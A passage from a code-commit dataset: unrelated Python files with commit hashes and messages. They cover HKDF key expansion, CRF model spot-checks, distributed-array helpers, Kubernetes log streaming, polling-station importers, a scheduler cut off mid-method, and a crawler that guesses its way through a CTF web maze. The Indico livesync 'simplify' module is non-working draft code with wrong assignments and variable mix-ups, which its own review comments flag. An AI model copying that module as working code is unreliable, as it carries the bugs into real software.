            raise ValueError("The OKM's length cannot be larger than %d." % \
                             (self.HashLen * 255))

        if len(prk) < self.HashLen:
            raise ValueError("The PRK must be at least %d bytes in length." % \
                             self.HashLen)

        self.N = math.ceil(float(length) / self.HashLen)  # block count (not read below)
        self.prk = prk
        self.info = info
        self.length = length
        self.ctr = 1   # one-byte block counter, starts at 1 per the RFC
        self.T = ""    # concatenated output blocks T(1) | T(2) | ...

    def expand( self ):
        """Expands, based on PRK, info and L, the given input material to the
        output key material."""

        tmp = ""

        # Prevent the accidental re-use of output keying material.
        if len(self.T) > 0:
            raise base.PluggableTransportError("HKDF-SHA256 OKM must not " \
                                               "be re-used by application.")

        # T(n) = HMAC(PRK, T(n-1) | info | n); concatenate blocks until
        # enough material exists, then truncate to the requested length.
        while self.length > len(self.T):
            tmp = HMAC.new(self.prk, tmp + self.info + chr(self.ctr),
                           SHA256).digest()
            self.T += tmp
            self.ctr += 1

        return self.T[:self.length]
| Python | 0 | |
7cf5f0a4e2b7c8e83f26ea3f9170c5ee0e7bbdbb | make it easier to compare/validate models | parserator/spotcheck.py | parserator/spotcheck.py | import pycrfsuite
def compareTaggers(model1, model2, string_list, module_name):
    """
    Compare two models. Given a list of strings, prints out tokens & tags
    whenever the two taggers parse a string differently. This is for spot-checking models
    :param tagger1: a .crfsuite filename
    :param tagger2: another .crfsuite filename
    :param string_list: a list of strings to be checked
    :param module_name: name of a parser module
    """
    module = __import__(module_name)

    # both model files are expected inside the parser module's directory
    tagger1 = pycrfsuite.Tagger()
    tagger1.open(module_name+'/'+model1)
    tagger2 = pycrfsuite.Tagger()
    tagger2.open(module_name+'/'+model2)

    count_discrepancies = 0

    for string in string_list:
        tokens = module.tokenize(string)
        if tokens:
            features = module.tokens2features(tokens)

            tags1 = tagger1.tag(features)
            tags2 = tagger2.tag(features)
            if tags1 != tags2:
                # print the disagreement as a three-column table:
                # token | model1's tag | model2's tag
                count_discrepancies += 1
                print '\n'
                print "%s. %s" %(count_discrepancies, string)
                print '-'*75
                print_spaced('token', model1, model2)
                print '-'*75
                for token in zip(tokens, tags1, tags2):
                    print_spaced(token[0], token[1], token[2])

    print "\n\n%s of %s strings were labeled differently"%(count_discrepancies, len(string_list))
def print_spaced(s1, s2, s3):
    # fixed-width (25-char) three-column row used by the comparison tables
    n = 25
    print s1 + " "*(n-len(s1)) + s2 + " "*(n-len(s2)) + s3
def validateTaggers(model1, model2, labeled_string_list, module_name):
    """Check two models against labeled truth data.

    For every (string, components) pair, tag the string with both models
    and print the cases where one or both disagree with the true tags (a
    leading '*' marks a wrong model's column), then print summary counts.
    """
    module = __import__(module_name)

    tagger1 = pycrfsuite.Tagger()
    tagger1.open(module_name+'/'+model1)
    tagger2 = pycrfsuite.Tagger()
    tagger2.open(module_name+'/'+model2)

    wrong_count_1 = 0
    wrong_count_2 = 0
    wrong_count_both = 0
    correct_count = 0

    for labeled_string in labeled_string_list:
        unlabeled_string, components = labeled_string
        tokens = module.tokenize(unlabeled_string)
        if tokens:
            features = module.tokens2features(tokens)
            # components is a sequence of (token, tag) pairs; keep the tags
            _, tags_true = zip(*components)
            tags_true = list(tags_true)
            tags1 = tagger1.tag(features)
            tags2 = tagger2.tag(features)

            if (tags1 != tags_true) and (tags2 != tags_true):
                print "\nSTRING: ", unlabeled_string
                print "TRUE: ", tags_true
                print "*%s: "%model1, tags1
                print "*%s: "%model2, tags2
                wrong_count_both += 1
            elif (tags1 != tags_true):
                print "\nSTRING: ", unlabeled_string
                print "TRUE: ", tags_true
                print "*%s: "%model1, tags1
                print "%s: "%model2, tags2
                wrong_count_1 += 1
            elif (tags2 != tags_true):
                print "\nSTRING: ", unlabeled_string
                print "TRUE: ", tags_true
                print "%s: "%model1, tags1
                print "*%s: "%model2, tags2
                wrong_count_2 += 1
            else:
                correct_count += 1

    print "\n\nBOTH WRONG: ", wrong_count_both
    print "%s WRONG: %s" %(model1, wrong_count_1)
    print "%s WRONG: %s" %(model2, wrong_count_2)
    print "BOTH CORRECT: ", correct_count
| Python | 0.000001 | |
d4adf3e0e177e80ce7bc825f1cb4e461e5551b2f | Add basic configuration support to oonib | oonib/config.py | oonib/config.py | from ooni.utils import Storage
import os
# XXX convert this to something that is a proper config file
main = Storage()
main.reporting_port = 8888
main.http_port = 8080
main.dns_udp_port = 5354
main.dns_tcp_port = 8002
main.daphn3_port = 9666
main.server_version = "Apache"
#main.ssl_private_key = /path/to/data/private.key
#main.ssl_certificate = /path/to/data/certificate.crt
#main.ssl_port = 8433
helpers = Storage()
helpers.http_return_request_port = 1234
daphn3 = Storage()
daphn3.yaml_file = "/path/to/data/oonib/daphn3.yaml"
daphn3.pcap_file = "/path/to/data/server.pcap"
| Python | 0 | |
2d76f1375ef1eb4d7ea1e8735d9ff55cfd12cea0 | introducing inline echo. print to stdout without the Fine newline | inline_echo.py | inline_echo.py | #!/usr/bin/env python
import sys
import os
def puaq(): # Print Usage And Quit
    """Print a one-line usage message and exit with a non-zero status."""
    print("Usage: %s string_content" % os.path.basename(__file__))
    sys.exit(1)
if __name__ == "__main__":
    if len(sys.argv) < 2:
        puaq()
    # write() instead of print(): no trailing newline -- the whole point
    # of an "inline" echo
    sys.stdout.write(sys.argv[1])
| Python | 0.999926 | |
58f05fe7736ce387bb8086128bc9de32b8cd6a59 | Add simplify.py | livesync/indico_livesync/simplify.py | livesync/indico_livesync/simplify.py | # This file is part of Indico.
# Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from indico_livesync.models.queue import ChangeType
def process_records(records):
    """Collapse queued change records into at most one change per object.

    NOTE(review): this looks like work in progress -- several statements
    below appear inconsistent; see the inline notes.
    """
    changes = {}
    for record in records:
        # skip records whose target no longer resolves (deletions exempt:
        # their object is gone by definition)
        if record.type != ChangeType.deleted and record.object is None:
            continue
        if record.type == ChangeType.created:
            # NOTE(review): stores the enum attribute `ChangeType.type`
            # rather than `record.type` (same in the branches below), and
            # uses `record.obj` although the guard above reads
            # `record.object` -- both look like typos to confirm.
            changes[record.obj] = ChangeType.type
        elif record.type == ChangeType.deleted:
            changes[record.obj] = ChangeType.type
        elif record.type in {ChangeType.moved, ChangeType.protection_changed}:
            # moves / protection changes affect the whole subtree
            changes.update(_cascade_change(record))
        elif record.type == ChangeType.title_changed:
            pass
        elif record.type == ChangeType.data_changed and not record.category_id:
            changes[record.obj] = ChangeType.type
    # NOTE(review): `records` is iterated as a sequence above, so
    # `records.iteritems()` here looks wrong (perhaps `changes.iteritems()`
    # was meant); the loop body is empty either way.
    for obj, state in records.iteritems():
        pass
pass
def _cascade_change(record):
    """Map `record`'s object -- and, recursively via `subrecords()`, every
    descendant record's object -- to that record's change type."""
    changes = {record.obj: record.type}
    for subrecord in record.subrecords():
        changes.update(_cascade_change(subrecord))
    return changes
| Python | 0.000725 | |
6a65d102bfcd667c382704ea3430d76faaa1b3d1 | Add tests | tests/test_salut.py | tests/test_salut.py | import unittest
from mock import MagicMock
import socket
import gevent
import gevent.socket
from otis.common.salut import Announcer, Browser
class TestSalut(unittest.TestCase):
    """Integration tests for Announcer/Browser service announce & browse.

    The tests poll the `announced` / `resolved` flags with short gevent
    sleeps instead of fixed timeouts, and use MagicMock attributes to
    verify the registered/resolved/unresolved callbacks.
    """

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_announce(self):
        # announcing a service eventually flips `announced`
        announcer = Announcer('Test', '_otis_test._tcp', 9999)
        while not announcer.announced:
            gevent.sleep(0.05)
        announcer.stop()

    def test_announce_registered_callback(self):
        callback = MagicMock()
        announcer = Announcer(
            'Test', '_otis_test._tcp', 9999, callback.registered)
        while not announcer.announced:
            gevent.sleep(0.05)
        # the callback receives the (domain, regtype, name) triple
        callback.registered.assert_called_once_with(
            'local.', '_otis_test._tcp.', 'Test')
        announcer.stop()

    def test_browse(self):
        announcer = Announcer('Test', '_otis_test._tcp', 9999)
        while not announcer.announced:
            gevent.sleep(0.05)
        browser = Browser(
            'Test', '_otis_test._tcp')
        while not browser.resolved:
            gevent.sleep(0.05)
        browser.stop()
        announcer.stop()

    def test_browse_resolved_callback(self):
        # the resolved callback must receive this host's IP and the port
        ip = gevent.socket.gethostbyname(socket.gethostname())
        port = 9999
        announcer = Announcer('Test', '_otis_test._tcp', port)
        while not announcer.announced:
            gevent.sleep(0.05)
        callback = MagicMock()
        browser = Browser(
            'Test', '_otis_test._tcp',
            resolved_callback=callback.resolved)
        while not browser.resolved:
            gevent.sleep(0.05)
        callback.resolved.assert_called_once_with(ip, port)
        browser.stop()
        announcer.stop()

    def test_browse_unresolved_callback(self):
        announcer = Announcer('Test', '_otis_test._tcp', 9999)
        while not announcer.announced:
            gevent.sleep(0.05)
        callback = MagicMock()
        browser = Browser(
            'Test', '_otis_test._tcp',
            unresolved_callback=callback.unresolved)
        while not browser.resolved:
            gevent.sleep(0.05)
        # stopping the announcer should eventually unresolve the browser
        announcer.stop()
        while announcer.announced:
            gevent.sleep(0.05)
        announcer = None
        while browser.resolved:
            gevent.sleep(0.05)
        callback.unresolved.assert_called_once()
        browser.stop()

    def test_unresolve_resolve(self):
        # a service that goes away and comes back must resolve again
        announcer = Announcer('Test', '_otis_test._tcp', 9999)
        while not announcer.announced:
            gevent.sleep(0.05)
        browser = Browser('Test', '_otis_test._tcp')
        while not browser.resolved:
            gevent.sleep(0.05)
        announcer.stop()
        while announcer.announced:
            gevent.sleep(0.05)
        announcer = None
        while browser.resolved:
            gevent.sleep(0.05)
        announcer = Announcer('Test', '_otis_test._tcp', 9999)
        while not announcer.announced:
            gevent.sleep(0.05)
        while not browser.resolved:
            gevent.sleep(0.05)
        browser.stop()
| Python | 0.000001 | |
f65a6c12dd615d235a306b130ebd63358429e8c6 | Create boss.py | boss.py | boss.py | # -*- coding: utf-8 -*-
import urllib
import urllib2
import re
from cookielib import CookieJar
# link extractor: matches href="./in..." links on the maze page
reg = re.compile(r'href="\.\/in[^"\\]*(?:\\.[^"\\]*)*"')
# extracts the ">...100." marker (presumably "stage/100" progress text)
stager = re.compile(r'>.+100.')
# stage number -> answer URL discovered so far
answers = {1: '/index.php?answer=42', 2: '/index.php?answer=bt'}
wrong = set()  # candidate links already proven not to advance a stage

# one cookie jar so the server-side maze session persists across requests
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
response = opener.open("http://maze.qctf.ru/index.php")
content = response.read()
stage = int(stager.findall(content)[0][1:-6])
chosen = answers[1]
response = opener.open("http://maze.qctf.ru"+answers[1])
prev_stage = 1
# Walk the maze: replay recorded answers for known stages, otherwise try
# the next unexplored link; whenever the stage counter advances, record
# the link that worked for that stage.
while True:
    content = response.read()
    stage = int(stager.findall(content)[0][1:-6])
    if stage == prev_stage+1:
        if stage > len(answers):
            print content
            print "Stage "+str(stage)
            print "Success "+str(stage-1)+" with "+chosen
            answers[stage-1] = chosen
    else:
        wrong.add(chosen)
    if len(answers) < stage:
        # no known answer yet: strip href="...", keep the path, try it
        v = [x[7:-1] for x in reg.findall(content)]
        for x in v:
            if x not in wrong:
                chosen = x
                break
        response = opener.open("http://maze.qctf.ru"+chosen)
    else:
        # replay the recorded answer for this stage
        chosen = answers[stage]
        response = opener.open("http://maze.qctf.ru"+answers[stage])
    prev_stage = stage
| Python | 0.000002 | |
3014e7cd47b87eaaf4cf793227a0bdba0a961494 | Determine `@local` function context from DistArrayProxies. | distarray/odin.py | distarray/odin.py | """
ODIN: ODin Isn't Numpy
"""
from IPython.parallel import Client
from distarray.client import DistArrayContext, DistArrayProxy
from itertools import chain
# Set up a global DistArrayContext on import
_global_client = Client()
_global_view = _global_client[:]
_global_context = DistArrayContext(_global_view)
context = _global_context
def flatten(lst):
    """Flatten exactly one level of nesting from *lst* into a new list.

    >>> flatten(zip(['a', 'b', 'c'], [1, 2, 3]))
    ['a', 1, 'b', 2, 'c', 3]

    >>> flatten([[1, 2], [3, 4, 5], [[5], [6], [7]]])
    [1, 2, 3, 4, 5, [5], [6], [7]]
    """
    return [element for inner in lst for element in inner]
def all_equal(lst):
    """Return True if all elements in `lst` are equal.

    Also returns True if the list is empty or has one element (vacuously).
    """
    # all() over a generator short-circuits at the first mismatch instead
    # of first materializing the whole comparison list; `not lst` keeps
    # the empty case explicit (all() over nothing is True anyway).
    return not lst or all(element == lst[0] for element in lst[1:])
def key_and_push_args(subcontext, arglist):
    """Collect one key per argument, pushing values to engines as needed.

    DistArrayProxy arguments already live on the engines, so their
    existing key is reused (after checking they belong to `subcontext`);
    any other value is assigned a fresh key and pushed out.

    Parameters
    ----------
    subcontext : DistArrayContext
    arglist : List of objects to key and/or push

    Returns
    -------
    arg_keys : list of keys
    """
    arg_keys = []
    for arg in arglist:
        if not isinstance(arg, DistArrayProxy):
            # if not a DistArrayProxy, key it and push it to engines
            arg_keys.extend(subcontext._key_and_push(arg))
            continue
        # if a DistArrayProxy, use its existing key
        arg_keys.append(arg.key)
        is_same_context = (subcontext == arg.context)
        err_msg_fmt = "DistArrayProxy context mismatch: {} {}"
        assert is_same_context, err_msg_fmt.format(subcontext, arg.context)
    return arg_keys
def determine_context(args):
    """Pick the DistArrayContext shared by the proxies in *args*.

    Non-proxy values are ignored.  When *args* contains no
    DistArrayProxy at all, the module-level default `context` is used.

    Returns
    -------
    DistArrayContext
        The context common to every DistArrayProxy in *args*.

    Raises
    ------
    ValueError
        If the proxies do not all share a single context.
    """
    contexts = [arg.context for arg in args if isinstance(arg, DistArrayProxy)]
    if not contexts:
        return context  # use the module-provided context
    if not all_equal(contexts):
        errmsg = "All DistArrayProxy objects must be defined in the same context: {}"
        raise ValueError(errmsg.format(contexts))
    return contexts[0]
def local(fn):
    """ Decorator indicating a function is run locally on engines.

    Parameters
    ----------
    fn : function to wrap to run locally on engines

    Returns
    -------
    fn : function wrapped to run locally on engines
    """
    # we want @local functions to be able to call each other, so push
    # their `__name__` as their key
    func_key = fn.__name__
    _global_context._push({func_key: fn})
    result_key = _global_context._generate_key()

    def inner(*args, **kwargs):
        # pick the context from the proxy arguments (positional + keyword)
        subcontext = determine_context(flatten((args, kwargs.values())))
        # generate keys for each parameter
        # push to engines if not a DistArrayProxy
        arg_keys = key_and_push_args(subcontext, args)
        kwarg_names = kwargs.keys()
        kwarg_keys = key_and_push_args(subcontext, kwargs.values())
        # build up a python statement as a string of the form
        # "<result_key> = <func_key>(<k1>,<k2>,<name>=<k3>,...)"
        args_fmt = ','.join(['{}'] * len(arg_keys))
        kwargs_fmt = ','.join(['{}={}'] * len(kwarg_keys))
        fnargs_fmt = ','.join([args_fmt, kwargs_fmt])
        statement_fmt = ''.join(['{} = {}(', fnargs_fmt, ')'])
        replacement_values = ([result_key, func_key] + arg_keys +
                              flatten(zip(kwarg_names, kwarg_keys)))
        statement = statement_fmt.format(*replacement_values)
        # execute it locally and return the result as a DistArrayProxy
        subcontext._execute(statement)
        return DistArrayProxy(result_key, subcontext)
    return inner
| """
ODIN: ODin Isn't Numpy
"""
from IPython.parallel import Client
from distarray.client import DistArrayContext, DistArrayProxy
from operator import add
# Set up a global DistArrayContext on import
_global_client = Client()
_global_view = _global_client[:]
_global_context = DistArrayContext(_global_view)
context = _global_context
def flatten(lst):
    """ Given a list of lists, return a flattened list.

    Only flattens one level. For example,

    >>> flatten(zip(['a', 'b', 'c'], [1, 2, 3]))
    ['a', 1, 'b', 2, 'c', 3]

    >>> flatten([[1, 2], [3, 4, 5], [[5], [6], [7]]])
    [1, 2, 3, 4, 5, [5], [6], [7]]

    """
    # A nested comprehension runs in O(total) time, whereas reduce(add, ...)
    # copies the accumulated list at every step (quadratic); it also works
    # on plain iterables, since no len() call is needed.
    return [item for sub in lst for item in sub]
def key_and_push_args(context, arglist):
    """ For each arg in arglist, get or generate a key (UUID).

    For DistArrayProxy objects, just get the existing key. For
    everything else, generate a key and push the value to the engines.

    Parameters
    ----------
    context : DistArrayContext
    arglist : List of objects to key and/or push

    Returns
    -------
    arg_keys : list of keys

    Raises
    ------
    ValueError
        If a DistArrayProxy argument belongs to a different context.
    """
    arg_keys = []
    for arg in arglist:
        if isinstance(arg, DistArrayProxy):
            # if a DistArrayProxy, use its existing key
            arg_keys.append(arg.key)
            if context != arg.context:
                # Raise instead of assert: asserts are stripped under -O and
                # a context mismatch must never pass silently.  ValueError is
                # consistent with determine_context().
                err_msg_fmt = "distarray context mismatch: {} {}"
                raise ValueError(err_msg_fmt.format(context, arg.context))
        else:
            # if not a DistArrayProxy, key it and push it to engines
            arg_keys.extend(context._key_and_push(arg))
    return arg_keys
def local(fn):
    """ Decorator indicating a function is run locally on engines.

    The wrapped function accepts an optional ``context`` keyword argument
    selecting the DistArrayContext to run on (defaults to the module-level
    ``context``).

    Parameters
    ----------
    fn : function to wrap to run locally on engines

    Returns
    -------
    fn : function wrapped to run locally on engines
    """
    # we want @local functions to be able to call each other, so push
    # their `__name__` as their key
    func_key = fn.__name__
    _global_context._push({func_key: fn})

    def inner(*args, **kwargs):
        subcontext = kwargs.pop('context', None)
        if subcontext is None:
            subcontext = context
        # Generate a fresh result key for every call.  Generating it once at
        # decoration time (as before) made successive calls reuse the same
        # key, so each call clobbered the previous call's result on the
        # engines.
        result_key = _global_context._generate_key()
        # generate keys for each parameter
        # push to engines if not a DistArrayProxy
        arg_keys = key_and_push_args(subcontext, args)
        kwarg_names = kwargs.keys()
        kwarg_keys = key_and_push_args(subcontext, kwargs.values())
        # build up a python statement as a string, of the form
        # result_key = func_key(arg0, ..., name0=kwval0, ...)
        args_fmt = ','.join(['{}'] * len(arg_keys))
        kwargs_fmt = ','.join(['{}={}'] * len(kwarg_keys))
        fnargs_fmt = ','.join([args_fmt, kwargs_fmt])
        statement_fmt = ''.join(['{} = {}(', fnargs_fmt, ')'])
        replacement_values = ([result_key, func_key] + arg_keys +
                              flatten(zip(kwarg_names, kwarg_keys)))
        statement = statement_fmt.format(*replacement_values)
        # execute it locally and return the result as a DistArrayProxy
        subcontext._execute(statement)
        return DistArrayProxy(result_key, subcontext)
    return inner
| Python | 0 |
df7235e13c14f13dd27ede6c098a9b5b80b4b297 | Add test_functions | neuralmonkey/tests/test_functions.py | neuralmonkey/tests/test_functions.py | #!/usr/bin/env python3
"""Unit tests for functions.py."""
# tests: mypy, lint
import unittest
import tensorflow as tf
from neuralmonkey.functions import piecewise_function
class TestPiecewiseFunction(unittest.TestCase):
    """Tests for piecewise_function (step-constant value chosen by x)."""

    def test_piecewise_constant(self):
        # Values [-0.5, 1.2, 3, 2] with boundaries [-1, 2, 1000]: the
        # asserts below show value i+1 takes effect once x >= boundaries[i]
        # (e.g. x == -1 already yields 1.2, x == 1000 yields 2).
        x = tf.placeholder(dtype=tf.int32)
        y = piecewise_function(x, [-0.5, 1.2, 3, 2], [-1, 2, 1000],
                               dtype=tf.float32)

        with tf.Session() as sess:
            self.assertAlmostEqual(sess.run(y, {x: -2}), -0.5)
            self.assertAlmostEqual(sess.run(y, {x: -1}), 1.2)
            self.assertAlmostEqual(sess.run(y, {x: 999}), 3)
            self.assertAlmostEqual(sess.run(y, {x: 1000}), 2)
            self.assertAlmostEqual(sess.run(y, {x: 1001}), 2)


if __name__ == "__main__":
    unittest.main()
| Python | 0.000018 | |
b2acb7dfd7dc08afd64d80f25ab0a76469e5fff6 | add import script for North Lanarkshire | polling_stations/apps/data_collection/management/commands/import_north_lanarkshire.py | polling_stations/apps/data_collection/management/commands/import_north_lanarkshire.py | from data_collection.management.commands import BaseScotlandSpatialHubImporter
"""
Note:
This importer provides coverage for 173/174 districts
due to incomplete/poor quality data
"""
class Command(BaseScotlandSpatialHubImporter):
    """Polling station/district importer for North Lanarkshire."""

    council_id = 'S12000044'
    council_name = 'North Lanarkshire'
    elections = ['local.north-lanarkshire.2017-05-04']

    def station_record_to_dict(self, record):
        # Normalise the station code before delegating: strip spaces and
        # force upper case so codes match district codes.
        code = self.parse_string(record[1])
        record[1] = code.replace(' ', '').upper()
        return super().station_record_to_dict(record)

    def district_record_to_dict(self, record):
        # Normalise the district code the same way as station codes.
        code = self.parse_string(record[0])
        record[0] = code.replace(' ', '').upper()
        return super().district_record_to_dict(record)
| Python | 0 | |
cc907c9b8f22bd08ed6460e5e99ebb4e8ce5a499 | add import script for Perth and Kinross | polling_stations/apps/data_collection/management/commands/import_perth_and_kinross.py | polling_stations/apps/data_collection/management/commands/import_perth_and_kinross.py | from data_collection.management.commands import BaseScotlandSpatialHubImporter
"""
Note:
This importer provides coverage for 104/107 districts
due to incomplete/poor quality data
"""
class Command(BaseScotlandSpatialHubImporter):
    """Polling district/station importer for Perth and Kinross."""
    council_id = 'S12000024'
    council_name = 'Perth and Kinross'
    elections = ['local.perth-and-kinross.2017-05-04']
| Python | 0 | |
a9ed1a52a552d76246028d892cc6d01e5ac069cf | Move sidecar to api | api/events/monitors/sidecar.py | api/events/monitors/sidecar.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import logging
import os
import time
from django.conf import settings
from polyaxon_k8s.constants import PodLifeCycle
from polyaxon_k8s.manager import K8SManager
from api.config_settings import CeleryPublishTask
from api.celery_api import app as celery_app
from libs.redis_db import RedisToStream
from events.tasks import handle_events_job_logs
logger = logging.getLogger('polyaxon.monitors.sidecar')
def run(k8s_manager, pod_id, job_id):
    """Follow the job container's log stream and fan each line out.

    Every line is scheduled for persistence via handle_events_job_logs and,
    when a client is watching, also published on the streaming channel.
    Blocks for as long as the log stream stays open.
    """
    raw = k8s_manager.k8s_api.read_namespaced_pod_log(pod_id,
                                                      k8s_manager.namespace,
                                                      container=job_id,
                                                      follow=True,
                                                      _preload_content=False)
    for log_line in raw.stream():
        experiment_id = 0  # TODO extract experiment id
        logger.info("Publishing event: {}".format(log_line))
        handle_events_job_logs.delay(experiment_id=experiment_id,
                                     job_id=job_id,
                                     log_line=log_line,
                                     persist=settings.PERSIST_EVENTS)
        # Only publish to the live-stream channel when somebody is actually
        # monitoring this job's or experiment's logs.
        if (RedisToStream.is_monitored_job_logs(job_id) or
                RedisToStream.is_monitored_experiment_logs(experiment_id)):
            celery_app.send_task(CeleryPublishTask.PUBLISH_LOGS_SIDECAR,
                                 kwargs={'experiment_id': experiment_id,
                                         'job_id': job_id,
                                         'log_line': log_line})
def can_log(k8s_manager, pod_id):
    """Block until the pod reaches the RUNNING phase.

    Polls the pod status every LOG_SLEEP_INTERVAL seconds; logs cannot be
    followed before the container runs.  NOTE(review): there is no timeout,
    so this loops forever if the pod never starts -- confirm that is intended.
    """
    status = k8s_manager.k8s_api.read_namespaced_pod_status(pod_id,
                                                            k8s_manager.namespace)
    logger.debug(status)
    while status.status.phase != PodLifeCycle.RUNNING:
        time.sleep(settings.LOG_SLEEP_INTERVAL)
        status = k8s_manager.k8s_api.read_namespaced_pod_status(pod_id,
                                                                k8s_manager.namespace)
def main():
    """Sidecar entry point: wait for the monitored pod, then stream its logs.

    Pod and job identifiers come from the POLYAXON_POD_ID / POLYAXON_JOB_ID
    environment variables (KeyError if unset).
    """
    pod_id = os.environ['POLYAXON_POD_ID']
    job_id = os.environ['POLYAXON_JOB_ID']
    k8s_manager = K8SManager(namespace=settings.NAMESPACE, in_cluster=True)
    can_log(k8s_manager, pod_id)
    run(k8s_manager, pod_id, job_id)
    logger.debug('Finished logging')


if __name__ == '__main__':
    main()
| Python | 0.000001 | |
6b81d938ed99a943e8e81816b9a013b488d4dfd8 | Add util.py to decode wordpiece ids in Transformer | fluid/neural_machine_translation/transformer/util.py | fluid/neural_machine_translation/transformer/util.py | import sys
import re
import six
import unicodedata
# Regular expression for unescaping token strings.
# '\u' is converted to '_'
# '\\' is converted to '\'
# '\213;' is converted to unichr(213)
# Inverse of escaping.
_UNESCAPE_REGEX = re.compile(r"\\u|\\\\|\\([0-9]+);")
# This set contains all letter and number characters.
_ALPHANUMERIC_CHAR_SET = set(
six.unichr(i) for i in range(sys.maxunicode)
if (unicodedata.category(six.unichr(i)).startswith("L") or
unicodedata.category(six.unichr(i)).startswith("N")))
def tokens_to_ustr(tokens):
    """
    Convert a list of tokens to a unicode string.

    A single space is inserted only between two consecutive tokens that
    both begin with an alphanumeric character.
    """
    pieces = []
    prev_alnum = False
    for tok in tokens:
        cur_alnum = tok[0] in _ALPHANUMERIC_CHAR_SET
        if pieces and prev_alnum and cur_alnum:
            pieces.append(u" ")
        pieces.append(tok)
        prev_alnum = cur_alnum
    return "".join(pieces)
def subtoken_ids_to_tokens(subtoken_ids, vocabs):
    """
    Convert a list of subtoken(wordpiece) ids to a list of tokens.

    Unknown ids map to the empty string; pieces are joined, split on the
    "_" end-of-token marker, and unescaped.
    """
    joined = "".join(vocabs.get(subtoken_id, u"") for subtoken_id in subtoken_ids)
    tokens = []
    for piece in joined.split("_"):
        if not piece:
            continue
        unescaped = unescape_token(piece + "_")
        if unescaped:
            tokens.append(unescaped)
    return tokens
def unescape_token(escaped_token):
    """
    Inverse of encoding escaping.

    Turns "\\u" back into "_", "\\\\" into "\\" and "\\<num>;" into the
    character with that code point; an invalid code point becomes U+3013.
    """
    if escaped_token.endswith("_"):
        escaped_token = escaped_token[:-1]

    def _replace(m):
        code = m.group(1)
        if code is None:
            return u"_" if m.group(0) == u"\\u" else u"\\"
        try:
            return six.unichr(int(code))
        except (ValueError, OverflowError) as _:
            return u"\u3013"  # Unicode for undefined character.

    return _UNESCAPE_REGEX.sub(_replace, escaped_token)
def subword_ids_to_str(ids, vocabs):
    """
    Convert a list of subtoken(word piece) ids to a native string.
    Refer to SubwordTextEncoder in Tensor2Tensor.
    """
    # NOTE(review): the trailing .decode("utf-8") implies this module runs
    # under Python 2 (decoding a byte string); under Python 3 str has no
    # .decode -- confirm the target interpreter.
    return tokens_to_ustr(subtoken_ids_to_tokens(ids, vocabs)).decode("utf-8")
| Python | 0.000002 | |
04e488fd1a0b08519aa806bfa598d7fc57452d76 | split scheddata from scheduler | pyworker/scheddata.py | pyworker/scheddata.py | import time
class scheddata(object):
    """
    Schedule bookkeeping for named services (Python 2 code: iteritems/iterkeys).

    _srv = {
        "srvname1": {
            "begintime": 1460689440,
            "interval": 1,  # measured by minutes
            "maxcount": 4,
            "processing": {
                nexttime1: [srvlist, occupied],
                nexttime2: [srvlist, occupied],
                nexttime3: [srvlist, occupied],
                ...
            }
        },
        ...
    }

    if begintime is 0, interval is nonsense
    if begintime is time, interval is used to calculate next begintime
    maxcount limit elements number of processing
    processing is list of data to process now
    if processing number is less than maxcount, getdata will new a nexttime
    if begintime is not 0
    """
    def __init__(self):
        # service name -> schedule record, see class docstring
        self._srv = {}

    def initdata(self, srvname, begintime=0, interval=1, maxcount=1):
        """Register (or re-register) a service schedule; return a status string.

        A non-zero begintime is truncated down onto an interval boundary and
        interval is converted from minutes to seconds.

        NOTE(review): begintime/interval are only validated when srvname
        already exists -- a brand-new service accepts invalid values.
        """
        if srvname in self._srv:
            if begintime < 0 or interval <=0:
                return ("add data " + srvname + ", begintime: " + str(begintime)
                        + ", interval: " + str(interval) + ", maxcount: " + str(maxcount)
                        + " failed!!")
        else:
            self._srv[srvname] = {}
        if begintime == 0:
            # no periodic schedule; interval is meaningless
            self._srv[srvname]["begintime"] = begintime
            self._srv[srvname]["interval"] = 0
        else:
            # minutes -> seconds, then align begintime on an interval boundary
            interval *= 60
            begintime = int(begintime) - int(begintime) % interval
            self._srv[srvname]["begintime"] = begintime
            self._srv[srvname]["interval"] = interval
        self._srv[srvname]["maxcount"] = maxcount
        self._srv[srvname]["processing"] = {}
        return ("add data " + srvname + ", begintime: " + str(begintime)
                + ", interval: " + str(interval) + ", maxcount: " + str(maxcount)
                + " ok!!")

    def _displaydata(self, srvname):
        """Render one service's schedule as a human-readable string."""
        retstr = ""
        if srvname in self._srv:
            retstr += (srvname + ":\n")
            retstr += ("\t" + "begintime: " + str(self._srv[srvname]["begintime"]) + "\n")
            retstr += ("\t" + "interval: " + str(self._srv[srvname]["interval"]) + "\n")
            retstr += ("\t" + "maxcount: " + str(self._srv[srvname]["maxcount"]) + "\n")
            retstr += ("\t" + "processing:\n")
            for k, v in self._srv[srvname]["processing"].iteritems():
                retstr += ("\t\t" + str(k) + "\t" + str(v[0]) + "\t" + str(v[1]) + "\n")
        return retstr

    def displaydata(self, srvname=None):
        """Render one service, or all services when srvname is None/empty."""
        retstr = ""
        if not srvname:
            for k in self._srv.iterkeys():
                retstr += self._displaydata(k)
            return retstr
        else:
            return self._displaydata(srvname)

    def setdata(self, srvname, nexttime, srvlist):
        """Attach srvlist to the nexttime slot and mark it unoccupied.

        NOTE(review): for an unknown srvname this creates a bare record and
        then raises KeyError on "processing" -- call initdata() first.
        """
        if srvname not in self._srv:
            self._srv[srvname] = {}
        if nexttime not in self._srv[srvname]["processing"]:
            self._srv[srvname]["processing"][nexttime] = []
            self._srv[srvname]["processing"][nexttime].extend([srvlist, False])
        else:
            self._srv[srvname]["processing"][nexttime][0] = srvlist
            self._srv[srvname]["processing"][nexttime][1] = False

    def releasedata(self, srvname, nexttime):
        """Mark a slot as no longer occupied so getdata() can hand it out again."""
        if srvname in self._srv and nexttime in self._srv[srvname]["processing"]:
            self._srv[srvname]["processing"][nexttime][1] = False

    def getdata(self, srvname):
        """Return (nexttime, srvlist) for one due, unoccupied slot, else (None, None).

        For periodic services (begintime != 0) a new slot is materialised
        whenever fewer than maxcount slots exist.  A returned slot is marked
